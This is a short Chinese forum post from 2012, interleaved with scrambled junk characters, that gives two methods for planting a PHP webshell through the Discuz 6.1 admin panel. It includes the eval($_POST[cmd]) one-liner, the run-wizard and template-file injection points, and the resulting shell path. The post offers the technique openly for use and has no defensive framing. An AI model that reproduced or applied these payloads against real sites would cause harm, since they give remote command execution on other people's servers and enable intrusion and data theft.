discuz6.1两种方法后台拿shell
) B% X, p4 e; A9 I+ L6 w) F好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
% B) H0 n. ^( a9 v- r/ Q1:/ n1 ^7 Z# {- ?! X3 j* ]* J
http://127.0.0.1/discuz/admincp. ... zard&frames=yes& A) c& h' X8 ~
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell$ m, C% x# }5 Y4 u4 @
<?php eval($_POST[cmd]);?>) p' A( x7 |9 `7 u3 ?$ v$ \
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php- ^: O, Z& h7 Q4 o1 B! s
% J. t/ Y1 `6 [+ }$ p
- _ D& j. l( X2 Q0 |* F# j2:后台模板管理--默认模板套系--详情
8 B6 Z0 B) \+ l& v2 ]templates/default/actions.lang.php, W% P, Y X/ ?; F! t
jhackj\\');eval($_POST[cmd])?>;//
! w6 z: ~& _& c4 R# v7 S
) j0 R! Y; \* _, J" e" t6 O利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对